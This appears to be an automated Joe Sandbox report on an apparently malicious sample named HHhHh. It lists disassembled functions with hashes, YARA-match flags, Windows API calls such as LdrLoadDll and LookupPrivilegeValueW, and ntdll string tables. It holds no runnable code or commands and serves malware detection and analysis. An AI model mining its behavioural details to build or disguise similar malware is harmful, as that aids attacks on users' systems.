                                            • Opcode ID: 10c75d5d6b69dde34a12c770a9a9ca2d7b988c6aa5f4c84dcc17ccc71c67ce56
                                            • Instruction ID: f24184c3628aa9da05191c0321f590413ac89e8d1a1552844165845a4afdfd95
                                            • Opcode Fuzzy Hash: 10c75d5d6b69dde34a12c770a9a9ca2d7b988c6aa5f4c84dcc17ccc71c67ce56
                                            • Instruction Fuzzy Hash: 2D90026135140442D10071584418B460045D7E1301F95C015E2464564DC619CD526226
                                            Function 012D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d76044cacf8bf5501c626047a93b3256aaf8c86e37d988d2a56e05cb8219f128
                                            • Instruction ID: 575654a8d8faa8a17742850b1cd3833765d017ba159044afcd566d18acdb94ca
                                            • Opcode Fuzzy Hash: d76044cacf8bf5501c626047a93b3256aaf8c86e37d988d2a56e05cb8219f128
                                            • Instruction Fuzzy Hash: 57900221611400424140716888489464045BBE1211795C121A1D98560DC55989655765
                                            Function 012D2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b05b47a5a46fb3b6ac5f3ae83c7f74c718d075acceeddb311e945bbe82a1d0e8
                                            • Instruction ID: 65a524266a0f5f2ebc74d3e6fdf1c1237652d7890ef79a3818ba5ccf411a3d74
                                            • Opcode Fuzzy Hash: b05b47a5a46fb3b6ac5f3ae83c7f74c718d075acceeddb311e945bbe82a1d0e8
                                            • Instruction Fuzzy Hash: 5090023121180402D1007158481874B004597D0302F95C011A2564565DC62589516671
                                            Function 012D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 245aa14743d6cf9f08c27809f7dc2942f8c2432a2ee0055542190d55c4ab882d
                                            • Instruction ID: d4d244471b5ae3a8c45aef57c0595e0964fda9c53e77e878eac40f04915d7441
                                            • Opcode Fuzzy Hash: 245aa14743d6cf9f08c27809f7dc2942f8c2432a2ee0055542190d55c4ab882d
                                            • Instruction Fuzzy Hash: 97900221221C0042D20075684C18B47004597D0303F95C115A1554564CC91589615621
                                            Function 012D2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a696487e7190b2948b82147e4cb9c5ec04a62253d2a33c4ef8b47d0edf18731d
                                            • Instruction ID: a5a0fff02aa92542096c6c92e87f8e021bd684e7b3ad8af089ac2c0cd9ec2dda
                                            • Opcode Fuzzy Hash: a696487e7190b2948b82147e4cb9c5ec04a62253d2a33c4ef8b47d0edf18731d
                                            • Instruction Fuzzy Hash: 2690027121140402D14071584408786004597D0301F95C011A6464564EC6598ED56765
                                            Function 012D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a319b26b2a463597cf56078f7e1431b9d3f24cb94d78c5e6892adfb553ffc123
                                            • Instruction ID: 04fe1394417e44057a6f3721e6d378d42e5396d4a5f3106463a3257c2e5f3895
                                            • Opcode Fuzzy Hash: a319b26b2a463597cf56078f7e1431b9d3f24cb94d78c5e6892adfb553ffc123
                                            • Instruction Fuzzy Hash: 1790022161140502D10171584408656004A97D0241FD5C022A2424565ECA258A92A231
                                            Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                            Function 0041A775 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID: .AP
                                            • API String ID: 3899507212-3996626295
                                            • Opcode ID: e61b40c025574b401a78bfe9db2f539b606469edda4e5e6174c8b14cf0485e2a
                                            • Instruction ID: b3a63027f1f00926f1fb70441b8d6ccb232baaf08920b71239fd0eb05aca1e60
                                            • Opcode Fuzzy Hash: e61b40c025574b401a78bfe9db2f539b606469edda4e5e6174c8b14cf0485e2a
                                            • Instruction Fuzzy Hash: 74117CB5200108AFDB24DF99CC81EEB77A9EF88354F118559FD0CAB241CA34E911CBB5
                                            Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 11 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                            Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 209 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a480 218->220 221 40838d 218->221 220->221 221->219
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                            Function 0041A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 258 41a7c4-41a7ea call 41af60 261 41a7ef-41a804 LookupPrivilegeValueW 258->261
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 0ae6ed938a06a61c109d6f046993a7fd160e32c36c9b4a6597b5ff70a7312098
                                            • Instruction ID: 25b5469650b98974735db6c4d2d2a304ca4a49614d427224d27622a745289fdf
                                            • Opcode Fuzzy Hash: 0ae6ed938a06a61c109d6f046993a7fd160e32c36c9b4a6597b5ff70a7312098
                                            • Instruction Fuzzy Hash: A3F06DB56002187BCB20DF59CC82FEB3B69EF89650F108155F94CAB251CA31A856CBB5
                                            Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 262 41a662-41a687 call 41af60 264 41a68c-41a6a1 RtlFreeHeap 262->264
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 671ac05dce972b1bff80523cdb79ed1244b733bce631a93464474c43285afc5d
                                            • Instruction ID: cc78a00d4919f9925c8fa9310bc212e34f1e6036800ba04be0d35b26e09f4849
                                            • Opcode Fuzzy Hash: 671ac05dce972b1bff80523cdb79ed1244b733bce631a93464474c43285afc5d
                                            • Instruction Fuzzy Hash: F5E092B1200104BFDB14DFA4CC44EE73B69EF88754F118659F91C97382C531E915CAB0
                                            Function 0040ACE4 Relevance: 1.5, APIs: 1, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 265 40ace4-40ace5 266 40ad35-40ad4e call 41d2f0 call 41b4a0 265->266 267 40ace7-40aceb 265->267 273 40ad50-40ad64 LdrLoadDll 266->273 274 40ad67-40ad6a 266->274 267->266 273->274
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction ID: e8cccf4a5d31956354dd1af7ddd13c5c7436c72505274465b74679457c2b75a5
                                            • Opcode Fuzzy Hash: 1a4e4c258f6369eeebccb192aca4d5ed3026d76eb848f578d66d6bb6a398f8bf
                                            • Instruction Fuzzy Hash: 3FE065B5E00109AFDF00CBA5D842F9DB774AF1430CF048596E91896641E634E654CB96
                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 275 41a670-41a686 276 41a68c-41a6a1 RtlFreeHeap 275->276 277 41a687 call 41af60 275->277 277->276
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Function 012D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2af3a5a0b7c0890712133d63cf391e116edaf29434828f094808a5287c780339
                                            • Instruction ID: 14e98c1b94af59478e92705a914c89d060e109eda8c600aff4353878b708b148
                                            • Opcode Fuzzy Hash: 2af3a5a0b7c0890712133d63cf391e116edaf29434828f094808a5287c780339
                                            • Instruction Fuzzy Hash: F8B09B719115D5C5DA12E764460C717794077D0701F56C061D3430651F4738C5D1E375

                                            Non-executed Functions

                                            Function 01348D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            • The critical section is owned by thread %p., xrefs: 01348E69
                                            • *** then kb to get the faulting stack, xrefs: 01348FCC
                                            • write to, xrefs: 01348F56
                                            • <unknown>, xrefs: 01348D2E, 01348D81, 01348E00, 01348E49, 01348EC7, 01348F3E
                                            • This failed because of error %Ix., xrefs: 01348EF6
                                            • an invalid address, %p, xrefs: 01348F7F
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 01348E02
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 01348F3F
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01348DB5
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01348D8C
                                            • The resource is owned exclusively by thread %p, xrefs: 01348E24
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01348E86
                                            • read from, xrefs: 01348F5D, 01348F62
                                            • The instruction at %p referenced memory at %p., xrefs: 01348EE2
                                            • *** enter .exr %p for the exception record, xrefs: 01348FA1
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01348F2D
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01348E4B
                                            • The instruction at %p tried to %s , xrefs: 01348F66
                                            • *** Inpage error in %ws:%s, xrefs: 01348EC8
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01348F34
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01348DC4
                                            • The resource is owned shared by %d threads, xrefs: 01348E2E
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01348E3F
                                            • *** enter .cxr %p for the context, xrefs: 01348FBD
                                            • a NULL pointer, xrefs: 01348F90
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01348FEF
                                            • Go determine why that thread has not released the critical section., xrefs: 01348E75
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01348DA3
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01348DD3
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01348F26
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: d0654006c7c0ad37c2977538e8b9f17eb2eae094324f2386c31833af2b70fe63
                                            • Instruction ID: 04c577fbeb9e47d7e74523b9f97b7d6b13185eec1f2867ea57e1bc759268287d
                                            • Opcode Fuzzy Hash: d0654006c7c0ad37c2977538e8b9f17eb2eae094324f2386c31833af2b70fe63
                                            • Instruction Fuzzy Hash: C5813879A11214BFDB25EA59DC45EAB3F79FF66B18F010088F6086F192E375D402CBA1
                                            Function 01312349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 24f1b4f0952bb43eb08708dfb9f32ef690a851cd15850a3f5a59147ebce8846c
                                            • Instruction ID: 0fc3333dbbca26d73d3d8bb3d570a93a8f61728e1264de0fe42c84df7e998acd
                                            • Opcode Fuzzy Hash: 24f1b4f0952bb43eb08708dfb9f32ef690a851cd15850a3f5a59147ebce8846c
                                            • Instruction Fuzzy Hash: 9392C071614342AFE729DF28C880B6BBBE9BF84758F14482DFA94D7254D770E844CB92
                                            Function 012C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • Critical section address, xrefs: 01305425, 013054BC, 01305534
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01305543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013054E2
                                            • undeleted critical section in freed memory, xrefs: 0130542B
                                            • Critical section address., xrefs: 01305502
                                            • double initialized or corrupted critical section, xrefs: 01305508
                                            • Invalid debug info address of this critical section, xrefs: 013054B6
                                            • Address of the debug info found in the active list., xrefs: 013054AE, 013054FA
                                            • Critical section debug info address, xrefs: 0130541F, 0130552E
                                            • corrupted critical section, xrefs: 013054C2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0130540A, 01305496, 01305519
                                            • Thread identifier, xrefs: 0130553A
                                            • 8, xrefs: 013052E3
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013054CE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: d7ae462de9e5406728d1b6d46e0005ad4ff490e52644d770623a514a86ed5bb2
                                            • Instruction ID: 9e65db56ae2d5cfeba371cdfb10864e123798e127dd4ffd404af87f14a87ec84
                                            • Opcode Fuzzy Hash: d7ae462de9e5406728d1b6d46e0005ad4ff490e52644d770623a514a86ed5bb2
                                            • Instruction Fuzzy Hash: 2D817CB0A51349EFDB21CF99C855BAEBBF9EB08B14F104159F605B7680D3B1A940CF60
                                            Function 012C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013022E4
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01302409
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013024C0
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01302412
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01302506
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01302498
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01302624
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013025EB
                                            • @, xrefs: 0130259B
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0130261F
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01302602
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 12d7d5240a1587e07a82d1a5752edf2c72ab18b96278599ed75d03a2dccd28d2
                                            • Instruction ID: b31955b968c801820c95dc38b995983913b85e8a3bf18f7e124567df8d703984
                                            • Opcode Fuzzy Hash: 12d7d5240a1587e07a82d1a5752edf2c72ab18b96278599ed75d03a2dccd28d2
                                            • Instruction Fuzzy Hash: 02028FB1D102299BDB21DB54CC85BEAB7B8AB54704F0141EAE709B7281EB709F84CF59
                                            Function 01338B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: e05c4b993090e2eecc96529dd570ad99ee2eee289c3257c0a4bc6924857be555
                                            • Instruction ID: 0352eae58d40986638e5b321f794d4ed7b8cccc401ec3abe90d9845aa47a023a
